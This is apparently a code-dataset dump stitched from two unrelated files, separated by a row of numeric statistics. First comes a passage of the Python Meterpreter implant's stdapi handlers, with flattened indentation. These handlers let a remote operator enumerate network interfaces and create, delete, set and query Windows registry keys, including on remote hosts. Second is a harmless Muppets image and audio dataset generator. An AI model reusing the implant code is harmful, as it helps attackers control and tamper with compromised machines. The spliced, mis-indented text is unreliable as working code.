iphlpapi.GetAdaptersAddresses(socket.AF_UNSPEC, Flags, None, AdapterAddresses, ctypes.byref(SizePointer))
AdapterAddressesData = (ctypes.c_uint8 * SizePointer.value)()
iphlpapi.GetAdaptersAddresses(socket.AF_UNSPEC, Flags, None, ctypes.byref(AdapterAddressesData), ctypes.byref(SizePointer))
AdapterAddresses = ctypes.string_at(ctypes.byref(AdapterAddressesData), SizePointer.value)
AdapterAddresses = cstruct_unpack(IP_ADAPTER_ADDRESSES, AdapterAddresses)
if AdapterAddresses.u.s.Length <= 72:
return stdapi_net_config_get_interfaces_via_windll_mib()
win_version = windll_GetVersion()
interfaces = []
pAdapterAddresses = ctypes.byref(AdapterAddresses)
while pAdapterAddresses:
AdapterAddresses = cstruct_unpack(IP_ADAPTER_ADDRESSES, pAdapterAddresses)
pAdapterAddresses = AdapterAddresses.Next
pFirstPrefix = AdapterAddresses.FirstPrefix
iface_info = {}
iface_info['index'] = AdapterAddresses.u.s.IfIndex
if AdapterAddresses.PhysicalAddressLength:
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
iface_desc = ctypes.wstring_at(AdapterAddresses.Description)
if not is_str(iface_desc):
iface_desc = str(iface_desc)
iface_info['name'] = iface_desc
iface_info['mtu'] = AdapterAddresses.Mtu
pUniAddr = AdapterAddresses.FirstUnicastAddress
while pUniAddr:
UniAddr = cstruct_unpack(IP_ADAPTER_UNICAST_ADDRESS, pUniAddr)
pUniAddr = UniAddr.Next
address = cstruct_unpack(SOCKADDR, UniAddr.Address.lpSockaddr)
if not address.sa_family in (socket.AF_INET, socket.AF_INET6):
continue
prefix = 0
if win_version.dwMajorVersion >= 6:
prefix = UniAddr.OnLinkPrefixLength
elif pFirstPrefix:
ip_adapter_prefix = 'QPPIL'
prefix_data = ctypes.string_at(pFirstPrefix, struct.calcsize(ip_adapter_prefix))
prefix = struct.unpack(ip_adapter_prefix, prefix_data)[4]
iface_addresses = iface_info.get('addrs', [])
if address.sa_family == socket.AF_INET:
iface_addresses.append((socket.AF_INET, ctypes.string_at(ctypes.byref(address.sa_data), 6)[2:], prefix))
else:
iface_addresses.append((socket.AF_INET6, ctypes.string_at(ctypes.byref(address.sa_data), 22)[6:], prefix))
iface_info['addrs'] = iface_addresses
interfaces.append(iface_info)
return interfaces
def stdapi_net_config_get_interfaces_via_windll_mib():
iphlpapi = ctypes.windll.iphlpapi
table = (ctypes.c_uint8 * (ctypes.sizeof(MIB_IPADDRROW) * 33))()
pdwSize = ctypes.c_ulong()
pdwSize.value = ctypes.sizeof(table)
if (iphlpapi.GetIpAddrTable(ctypes.byref(table), ctypes.byref(pdwSize), True) != 0):
return None
interfaces = []
table_data = ctypes.string_at(table, pdwSize.value)
entries = struct.unpack('I', table_data[:4])[0]
table_data = table_data[4:]
for i in range(entries):
addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
ifrow = MIB_IFROW()
ifrow.dwIndex = addrrow.dwIndex
if iphlpapi.GetIfEntry(ctypes.byref(ifrow)) != 0:
continue
iface_info = {}
table_data = table_data[ctypes.sizeof(MIB_IPADDRROW):]
iface_info['index'] = addrrow.dwIndex
iface_info['addrs'] = [(socket.AF_INET, struct.pack('<I', addrrow.dwAddr), struct.pack('<I', addrrow.dwMask))]
if ifrow.dwPhysAddrLen:
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(ifrow.bPhysAddr), ifrow.dwPhysAddrLen)
if ifrow.dwDescrLen:
iface_info['name'] = ifrow.bDescr
iface_info['mtu'] = ifrow.dwMtu
interfaces.append(iface_info)
return interfaces
@meterpreter.register_function
def stdapi_net_resolve_host(request, response):
hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
result = resolve_host(hostname, family)
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_hosts(request, response):
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
for hostname in packet_enum_tlvs(request, TLV_TYPE_HOST_NAME):
hostname = hostname['value']
try:
result = resolve_host(hostname, family)
except socket.error:
result = {'family':family, 'packed_address':''}
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_socket_tcp_shutdown(request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
how = packet_get_tlv(request, TLV_TYPE_SHUTDOWN_HOW).get('value', socket.SHUT_RDWR)
channel = meterpreter.channels[channel_id]
channel.shutdown(how)
return ERROR_SUCCESS, response
def _wreg_close_key(hkey):
ctypes.windll.advapi32.RegCloseKey(hkey)
@meterpreter.register_function_windll
def stdapi_registry_close_key(request, response):
_wreg_close_key(packet_get_tlv(request, TLV_TYPE_HKEY)['value'])
return ERROR_SUCCESS, response
@meterpreter.register_function_windll
def stdapi_registry_create_key(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
res_key = ctypes.c_void_p()
if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) != ERROR_SUCCESS:
return error_result_windows(), response
response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
return ERROR_SUCCESS, response
@meterpreter.register_function_windll
def stdapi_registry_delete_key(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
if (flags & DELETE_KEY_FLAG_RECURSIVE):
result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key))
else:
result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key))
return result, response
@meterpreter.register_function_windll
def stdapi_registry_delete_value(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name))
return result, response
def _wreg_enum_key(request, response, hkey):
ERROR_MORE_DATA = 0xea
ERROR_NO_MORE_ITEMS = 0x0103
name = (ctypes.c_char * 4096)()
index = 0
tries = 0
while True:
result = ctypes.windll.advapi32.RegEnumKeyA(hkey, index, name, ctypes.sizeof(name))
if result == ERROR_MORE_DATA:
if tries > 3:
break
name = (ctypes.c_char * (ctypes.sizeof(name) * 2))()
tries += 1
continue
elif result == ERROR_NO_MORE_ITEMS:
result = ERROR_SUCCESS
break
elif result != ERROR_SUCCESS:
break
tries = 0
response += tlv_pack(TLV_TYPE_KEY_NAME, ctypes.string_at(name))
index += 1
return result, response
@meterpreter.register_function_windll
def stdapi_registry_enum_key(request, response):
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
return _wreg_enum_key(request, response, hkey)
@meterpreter.register_function_windll
def stdapi_registry_enum_key_direct(request, response):
err, hkey = _wreg_open_key(request)
if err != ERROR_SUCCESS:
return err, response
ret = _wreg_enum_key(request, response, hkey)
_wreg_close_key(hkey)
return ret
def _wreg_enum_value(request, response, hkey):
ERROR_MORE_DATA = 0xea
ERROR_NO_MORE_ITEMS = 0x0103
name = (ctypes.c_char * 4096)()
name_sz = ctypes.c_uint32()
index = 0
tries = 0
while True:
name_sz.value = ctypes.sizeof(name)
result = ctypes.windll.advapi32.RegEnumValueA(hkey, index, name, ctypes.byref(name_sz), None, None, None, None)
if result == ERROR_MORE_DATA:
if tries > 3:
break
name = (ctypes.c_char * (ctypes.sizeof(name) * 3))()
tries += 1
continue
elif result == ERROR_NO_MORE_ITEMS:
result = ERROR_SUCCESS
break
elif result != ERROR_SUCCESS:
break
tries = 0
response += tlv_pack(TLV_TYPE_VALUE_NAME, ctypes.string_at(name))
index += 1
return result, response
@meterpreter.register_function_windll
def stdapi_registry_enum_value(request, response):
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
return _wreg_enum_value(request, response, hkey)
@meterpreter.register_function_windll
def stdapi_registry_enum_value_direct(request, response):
err, hkey = _wreg_open_key(request)
if err != ERROR_SUCCESS:
return err, response
ret = _wreg_enum_value(request, response, hkey)
_wreg_close_key(hkey)
return ret
@meterpreter.register_function_windll
def stdapi_registry_load_key(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
sub_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
sub_key = ctypes.create_string_buffer(bytes(sub_key, 'UTF-8'))
file_name = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
file_name = ctypes.create_string_buffer(bytes(file_name, 'UTF-8'))
result = ctypes.windll.advapi32.RegLoadKeyA(root_key, ctypes.byref(sub_key), ctypes.byref(file_name))
return result, response
def _wreg_open_key(request):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
handle_id = ctypes.c_void_p()
if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) != ERROR_SUCCESS:
return error_result_windows(), 0
return ERROR_SUCCESS, handle_id.value
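# Illustrative flow (matching the *_direct handlers below): a direct registry
# operation opens the key, acts on it and closes it in one round trip:
#
#     err, hkey = _wreg_open_key(request)
#     if err == ERROR_SUCCESS:
#         err, response = _query_value(request, response, hkey)
#         _wreg_close_key(hkey)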
@meterpreter.register_function_windll
def stdapi_registry_open_key(request, response):
err, hkey = _wreg_open_key(request)
if err != ERROR_SUCCESS:
return err, response
response += tlv_pack(TLV_TYPE_HKEY, hkey)
return ERROR_SUCCESS, response
@meterpreter.register_function_windll
def stdapi_registry_open_remote_key(request, response):
target_host = packet_get_tlv(request, TLV_TYPE_TARGET_HOST)['value']
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
result_key = ctypes.c_void_p()
if ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key)) != ERROR_SUCCESS:
return error_result_windows(), response
response += tlv_pack(TLV_TYPE_HKEY, result_key.value)
return ERROR_SUCCESS, response
@meterpreter.register_function_windll
def stdapi_registry_query_class(request, response):
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
value_data = (ctypes.c_char * 4096)()
value_data_sz = ctypes.c_uint32()
value_data_sz.value = ctypes.sizeof(value_data)
if ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None) != ERROR_SUCCESS:
return error_result_windows(), response
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data))
return ERROR_SUCCESS, response
def _query_value(request, response, hkey):
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
value_type = ctypes.c_uint32()
value_type.value = 0
value_data = (ctypes.c_ubyte * 4096)()
value_data_sz = ctypes.c_uint32()
value_data_sz.value = ctypes.sizeof(value_data)
result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
if result == ERROR_SUCCESS:
response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
if value_type.value == winreg.REG_SZ:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE)
elif value_type.value == winreg.REG_DWORD:
value = value_data[:4]
value.reverse()
if sys.version_info[0] < 3:
value = ''.join(map(chr, value))
else:
value = bytes(value)
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
else:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
return ERROR_SUCCESS, response
return error_result_windows(), response
@meterpreter.register_function_windll
def stdapi_registry_query_value(request, response):
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
return _query_value(request, response, hkey)
@meterpreter.register_function_windll
def stdapi_registry_query_value_direct(request, response):
err, hkey = _wreg_open_key(request)
if err != ERROR_SUCCESS:
return err, response
ret = _query_value(request, response, hkey)
_wreg_close_key(hkey)
return ret
def _set_value(request, response, hkey):
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data))
return result, response
@meterpreter.register_function_windll
def stdapi_registry_set_value(request, response):
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
return _set_value(request, response, hkey)
@meterpreter.register_function_windll
def stdapi_registry_set_value_direct(request, response):
err, hkey = _wreg_open_key(request)
if err != ERROR_SUCCESS:
return err, response
ret = _set_value(request, response, hkey)
_wreg_close_key(hkey)
return ret
@meterpreter.register_function_windll
def stdapi_registry_unload_key(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
    base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
    base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
    result = ctypes.windll.advapi32.RegUnLoadKeyA(root_key, base_key)
return result, response
| 38.330594 | 163 | 0.721417 | 8,254 | 60,639 | 4.936273 | 0.109402 | 0.045528 | 0.036447 | 0.025427 | 0.477003 | 0.398856 | 0.358556 | 0.302278 | 0.277121 | 0.253043 | 0 | 0.026593 | 0.17027 | 60,639 | 1,581 | 164 | 38.354839 | 0.783201 | 0.006794 | 0 | 0.30137 | 0 | 0 | 0.046995 | 0.007172 | 0 | 0 | 0.004064 | 0 | 0 | 1 | 0.049748 | false | 0.002163 | 0.023071 | 0 | 0.167988 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b5b00877dbcb9ed0163d73b29d1f955098e8789 | 17,120 | py | Python | SIM1/src/dataset_generator.py | mledl/mupped-show-classification | 7f3c50ff6e95d164cac8529ddaea95cddab4da13 | [
"Apache-2.0"
] | null | null | null | SIM1/src/dataset_generator.py | mledl/mupped-show-classification | 7f3c50ff6e95d164cac8529ddaea95cddab4da13 | [
"Apache-2.0"
] | null | null | null | SIM1/src/dataset_generator.py | mledl/mupped-show-classification | 7f3c50ff6e95d164cac8529ddaea95cddab4da13 | [
"Apache-2.0"
] | null | null | null | import math
import random
import cv2
import glob
import librosa
import os
from pathlib import Path
from audio_extractor import extract_audio_snippets
character_map = {0: 'kermit_the_frog',
1: 'waldorf_and_statler',
2: 'pig',
3: 'swedish_chef',
4: 'none'}
file_map = {'Muppets-02-01-01.txt': 1,
'Muppets-02-04-04.txt': 2,
'Muppets-03-04-03.txt': 3}
video_base_path = '../../videos/'
ground_truth_files_base_path = '../../ground_truth/'
audio_snippet_path = '../../audio/'
mfcc_feature_file = '../../ground_truth/audio/mfcc.txt'
ground_truth_txt_files = ['../../ground_truth/Muppets-02-01-01/Muppets-02-01-01.txt',
'../../ground_truth/Muppets-02-04-04/Muppets-02-04-04.txt',
'../../ground_truth/Muppets-03-04-03/Muppets-03-04-03.txt']
def print_ground_truth_statistics(data_locations_dict):
"""
The aim of this method is to print statistics of the ground truth.
:param data_locations_dict: dict holding the ground truth location data
"""
character_location_map = {}
total_samples = 0
print('Number of samples per character in ground truth:')
for i in range(0, len(character_map)):
no_of_samples = 0
for key, data_locations in data_locations_dict.items():
character_location_map[key] = data_locations[i]
no_of_samples += len(data_locations[i])
total_samples += no_of_samples
print('%s: %d' % (character_map[i], no_of_samples))
print('total_samples: %d' % total_samples)
def extract_ground_truth(character_location_map, rest_location_map, character_id, output_path):
Path(output_path).mkdir(parents=True, exist_ok=True)
labels_file = open(output_path + 'labels.txt', 'w')
labels_file.write('txt_file, frame_id, label\n')
# write images of actual target character
print('[INFO] Start extracting images for target class: %d' % character_id)
for key, values in character_location_map.items():
video_path = video_base_path + key.split('.')[0] + '.avi'
cap = cv2.VideoCapture(video_path)
for value in values:
cap.set(cv2.CAP_PROP_POS_FRAMES, value)
ret, frame = cap.read()
if not ret:
print('Failed to read frame %d of video %r.' % (value, video_path))
labels_file.close()
exit(1)
filename = '%s/%d_%d_%d.jpg' % (output_path, file_map[key], value, character_id)
labels_file.write('%d, %d, %d\n' % (file_map[key], value, character_id))
cv2.imwrite(filename, frame)
print('[INFO] Start extracting randomly sampled images')
for key, values in rest_location_map.items():
for k, vals in values.items():
video_path = video_base_path + k.split('.')[0] + '.avi'
cap = cv2.VideoCapture(video_path)
for val in vals:
cap.set(cv2.CAP_PROP_POS_FRAMES, val)
ret, frame = cap.read()
if not ret:
print('Failed to read frame %d of video %r.' % (val, video_path))
labels_file.close()
exit(1)
filename = '%s/%d_%d_%d.jpg' % (output_path, file_map[k], val, key)
labels_file.write('%d, %d, %d\n' % (file_map[k], val, key))
cv2.imwrite(filename, frame)
labels_file.close()
def create_image_dataset_for_character(character_id, data_locations_dict, sub_path):
"""
The aim of this method is to generate a dataset for the specified character that consists of
    50% images labeled with the specified character and 50% randomly sampled from all other characters
:param character_id: the id of the character
:param data_locations_dict: dict holding the ground truth location data
:return:
"""
character_location_map = {}
half_length = 0
for key, data_locations in data_locations_dict.items():
character_location_map[key] = data_locations[character_id]
half_length += len(data_locations[character_id])
# calculate data distribution over ground truth and per video
data_distribution_map = {}
total_samples = 0
for i in range(0, len(character_map)):
if i != character_id:
temp = {}
for key, data_locations in data_locations_dict.items():
total_samples += len(data_locations[i])
temp[key] = len(data_locations[i])
data_distribution_map[i] = temp
# calculate absolute rest distribution map
rest_data_distribution_map = {}
for key, values in data_distribution_map.items():
temp = {}
for k, v in values.items():
temp[k] = math.ceil((v / total_samples) * half_length)
rest_data_distribution_map[key] = temp
# actually do the random sampling
rest_frameid_map = {}
random.seed(333)
for key, values in rest_data_distribution_map.items():
temp = {}
for k, v in values.items():
temp[k] = random.sample(data_locations_dict[k][key], v)
# check if sample is not a positive sample, if so replace it
for idx, value in enumerate(temp[k]):
if value in data_locations_dict[k][character_id]:
tmp_fnr = random.sample(data_locations_dict[k][key], 1)[0]
while tmp_fnr in data_locations_dict[k][character_id] or tmp_fnr in temp[k]:
tmp_fnr = random.sample(data_locations_dict[k][key], 1)[0]
temp[k][idx] = tmp_fnr
rest_frameid_map[key] = temp
extract_ground_truth(character_location_map, rest_frameid_map, character_id,
ground_truth_files_base_path + sub_path)
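# --- Illustrative sketch (not part of the original pipeline; names are hypothetical) ---
# The proportional allocation used above, in isolation: given per-source negative
# sample counts and a target of `half_length` negatives, each source contributes
# ceil(share * half_length), which is why the negative half can overshoot by a few samples.
def _demo_negative_allocation(counts_per_source, half_length):
    total = sum(counts_per_source.values())
    return {src: math.ceil((n / total) * half_length)
            for src, n in counts_per_source.items()}
# e.g. _demo_negative_allocation({'ep1': 30, 'ep2': 70}, 50) -> {'ep1': 15, 'ep2': 35}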
def parse_ground_truth_txt_files(ground_truth_files):
"""
The aim of this method is to parse the ground truth from corresponding text files.
:param ground_truth_files: a list of ground truth text file paths
:return: a dictionary representing the ground truth locations
"""
parsed_ground_truth = {}
for filename in ground_truth_files:
gt = {}
with open(filename, 'r') as f:
for i, line in enumerate(f):
str_parts = line.strip().split(', ')
parts = [int(p) for p in str_parts]
for part in parts[1:]:
try:
gt[part].append(parts[0])
except KeyError:
gt[part] = [parts[0]]
parsed_ground_truth[filename.split('/')[-1]] = gt
return parsed_ground_truth
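# --- Illustrative sketch (hypothetical data, not part of the original file) ---
# A ground-truth line such as "12, 0, 2" marks frame 12 as containing the
# characters with ids 0 and 2, so parsing it yields {0: [12], 2: [12]}:
def _demo_parse_ground_truth_line(line, gt=None):
    gt = {} if gt is None else gt
    parts = [int(p) for p in line.strip().split(', ')]
    for char_id in parts[1:]:
        gt.setdefault(char_id, []).append(parts[0])
    return gt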
def create_mfcc_audio_dataset(audio_path, frame_length_ms, n_mfcc, output_file):
# extract counts for snippets with and without given character
total_no_audios = len(glob.glob(audio_path + '*.wav'))
print('Total number of audio snippets: %d' % total_no_audios)
print('Window size: %d ms' % frame_length_ms)
print('Number of MFCC features: %d' % n_mfcc)
print('Extracting MFCC features for audio data...')
# define fft window and sliding window factors based on given frame length
mfcc_n_fft_factor = frame_length_ms / 1000 # window factor
    mfcc_hop_length_factor = mfcc_n_fft_factor * 0.5  # sliding window factor; its product with the sample rate is cast to int below
# extract MFCC features for all audio files
mfcc_audio_data = {}
for audio_file in glob.glob(audio_path + '*.wav'):
# extract file id and character id
filename = audio_file.split('/')[-1]
file_char_id = filename.split('_')[0][-1] + '_' + filename.split('_')[1]
raw_data, sample_rate = librosa.load(audio_file)
mfccs = librosa.feature.mfcc(y=raw_data, sr=sample_rate, n_mfcc=n_mfcc,
hop_length=int(mfcc_hop_length_factor * sample_rate),
n_fft=int(mfcc_n_fft_factor * sample_rate)).T
try:
mfcc_audio_data[file_char_id].append(mfccs)
except KeyError:
mfcc_audio_data[file_char_id] = [mfccs]
# write calculated MFCCs to file
print('Write extracted MFCCs to file: %s' % output_file)
with open(output_file, 'w') as f:
for key, values in mfcc_audio_data.items():
file_id = key.split('_')[0]
char_id = key.split('_')[1]
for mfcc_array in values:
for mfcc_values in mfcc_array:
list_as_string = ','.join([str(mfcc_values[i]) for i in range(0, mfcc_array.shape[1])])
f.write('%s, %s, %s\n' % (file_id, char_id, list_as_string))
def random_sample_mfcc(target_character_id, mfcc_file):
# read the mfcc features from file
print('Read MFCC features for random sampling...')
mfcc_data_all = {0: {}, 1: {}, 2: {}, 3: {}, 4: {}}
total_number_of_samples = 0
no_positive_samples = 0
with open(mfcc_file, 'r') as f:
for i, line in enumerate(f):
parts = line.split(',')
file_id = int(parts[0].strip())
char_id = int(parts[1].strip())
mfcc_coeffs = [float(parts[i].strip()) for i in range(2, len(parts))]
if char_id == target_character_id:
no_positive_samples += 1
try:
mfcc_data_all[char_id][file_id].append(mfcc_coeffs)
except KeyError:
mfcc_data_all[char_id][file_id] = [mfcc_coeffs]
total_number_of_samples += 1
    # extract the number of samples present for the target character
print('Number of samples for target class %d: %d' % (target_character_id, no_positive_samples))
# calculate data distribution
print('Create data distribution map...')
data_distribution_map = {0: {}, 1: {}, 2: {}, 3: {}, 4: {}}
no_rest_samples = total_number_of_samples - no_positive_samples
for char_id, value in mfcc_data_all.items():
if char_id != target_character_id:
for file_id, mfccs in value.items():
data_distribution_map[char_id][file_id] = math.ceil(
(len(mfccs) / no_rest_samples) * no_positive_samples)
# add positive samples to resulting dataset
dataset = []
for char_id, value in mfcc_data_all.items():
if char_id == target_character_id:
for file_id, mfccs in value.items():
dataset += [(1, file_id, mfcc) for mfcc in mfccs]
# randomly sample the negative samples according to data distribution
random.seed(333)
for char_id, value in data_distribution_map.items():
for file_id, k in value.items():
dataset += [(0, file_id, mfcc) for mfcc in random.sample(mfcc_data_all[char_id][file_id], k)]
print('Successfully extracted MFCC feature dataset for character: %d' % target_character_id)
return dataset
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
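# Example: list(chunks([1, 2, 3, 4, 5], 2)) -> [[1, 2], [3, 4], [5]]
# (the final chunk may be shorter than n; the caller below tolerates this)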
def random_sample_multi_mfcc(target_character_id, mfcc_file, audio_path, frame_length_ms, n_mfcc, mfcc_sequence_len):
# extract counts for snippets with and without given character
total_no_audios = len(glob.glob(audio_path + '*.wav'))
print('Total number of audio snippets: %d' % total_no_audios)
print('Window size: %d ms' % frame_length_ms)
print('Number of MFCC features: %d' % n_mfcc)
print('Extracting MFCC features for audio data...')
# define fft window and sliding window factors based on given frame length
mfcc_n_fft_factor = frame_length_ms / 1000 # window factor
    mfcc_hop_length_factor = mfcc_n_fft_factor * 0.5  # sliding window factor; its product with the sample rate is cast to int below
total_number_of_samples = 0
# extract MFCC features for all audio files
mfcc_audio_data = {}
for audio_file in glob.glob(audio_path + '*.wav'):
# extract file id and character id
filename = audio_file.split('/')[-1]
#file_char_id = filename.split('_')[0][-1] + '_' + filename.split('_')[1]
character_id = int(filename.split('_')[1])
raw_data, sample_rate = librosa.load(audio_file)
mfccs = librosa.feature.mfcc(y=raw_data, sr=sample_rate, n_mfcc=n_mfcc,
hop_length=int(mfcc_hop_length_factor * sample_rate),
n_fft=int(mfcc_n_fft_factor * sample_rate)).T
for mfcc_sequence in chunks(mfccs, mfcc_sequence_len):
total_number_of_samples += 1
try:
mfcc_audio_data[character_id].append(mfcc_sequence)
except KeyError:
mfcc_audio_data[character_id] = [mfcc_sequence]
no_positive_samples = len(mfcc_audio_data[target_character_id])
    # extract the number of samples present for the target character
print('Number of samples for target class %d: %d' % (target_character_id, no_positive_samples))
# calculate data distribution
print('Create data distribution map...')
data_distribution_map = {}
no_rest_samples = total_number_of_samples - no_positive_samples
for char_id, mfccs in mfcc_audio_data.items():
if char_id != target_character_id:
data_distribution_map[char_id] = math.ceil(
(len(mfccs) / no_rest_samples) * no_positive_samples)
# add positive samples to resulting dataset
dataset = []
for char_id, value in mfcc_audio_data.items():
if char_id == target_character_id:
for mfccs in value:
dataset.append([1, mfccs])
print(data_distribution_map)
# randomly sample the negative samples according to data distribution
random.seed(333)
for char_id, k in data_distribution_map.items():
dataset.extend([[0, mfcc] for mfcc in random.sample(mfcc_audio_data[char_id], k)])
print('Successfully extracted MFCC feature dataset for character: %d' % target_character_id)
return dataset
def get_waldorf_statler_mfcc_features(frame_length_ms, n_mfcc):
Path('../../ground_truth/audio/').mkdir(parents=True, exist_ok=True)
    # check if audio snippets have already been extracted
if len(os.listdir('../../audio')) == 0:
extract_audio_snippets()
# if mfcc data has not been extracted, call the extraction
if len(os.listdir('../../ground_truth/audio/')) == 0:
create_mfcc_audio_dataset(audio_snippet_path, frame_length_ms, n_mfcc, mfcc_feature_file)
return random_sample_mfcc(1, mfcc_feature_file)
def get_swedish_chef_mfcc_features(frame_length_ms, n_mfcc):
Path('../../ground_truth/audio/').mkdir(parents=True, exist_ok=True)
    # check if audio snippets have already been extracted
if len(os.listdir('../../audio')) == 0:
extract_audio_snippets()
# if mfcc data has not been extracted, call the extraction
if len(os.listdir('../../ground_truth/audio/')) == 0:
create_mfcc_audio_dataset(audio_snippet_path, frame_length_ms, n_mfcc, mfcc_feature_file)
return random_sample_mfcc(3, mfcc_feature_file)
def get_swedish_chef_multi_mfcc_features(frame_length_ms, n_mfcc, seq_len):
Path('../../ground_truth/audio/').mkdir(parents=True, exist_ok=True)
    # check if audio snippets have already been extracted
if len(os.listdir('../../audio')) == 0:
extract_audio_snippets()
return random_sample_multi_mfcc(3, mfcc_feature_file, audio_snippet_path, frame_length_ms, n_mfcc, seq_len)
def create_kermit_image_dataset():
Path('../../ground_truth/kermit/').mkdir(parents=True, exist_ok=True)
# extract kermit image dataset if not already created
if len(os.listdir('../../ground_truth/kermit/')) == 0:
ground_truth_locations = parse_ground_truth_txt_files(ground_truth_txt_files)
print_ground_truth_statistics(ground_truth_locations)
create_image_dataset_for_character(0, ground_truth_locations, 'kermit/')
else:
print('Kermit image dataset already created.')
def create_pig_image_dataset():
Path('../../ground_truth/pig/').mkdir(parents=True, exist_ok=True)
    # extract pig image dataset if not already created
if len(os.listdir('../../ground_truth/pig/')) == 0:
ground_truth_locations = parse_ground_truth_txt_files(ground_truth_txt_files)
print_ground_truth_statistics(ground_truth_locations)
create_image_dataset_for_character(2, ground_truth_locations, 'pig/')
else:
print('Pigs image dataset already created.')
def create_swedish_chef_image_dataset():
Path('../../ground_truth/swedish_chef/').mkdir(parents=True, exist_ok=True)
    # extract swedish chef image dataset if not already created
if len(os.listdir('../../ground_truth/swedish_chef/')) == 0:
ground_truth_locations = parse_ground_truth_txt_files(ground_truth_txt_files)
print_ground_truth_statistics(ground_truth_locations)
create_image_dataset_for_character(3, ground_truth_locations, 'swedish_chef/')
else:
print('Swedish Chef image dataset already created.')
if __name__ == '__main__':
#create_pig_image_dataset()
data = get_swedish_chef_multi_mfcc_features(20, 20, 50)
#print(data)
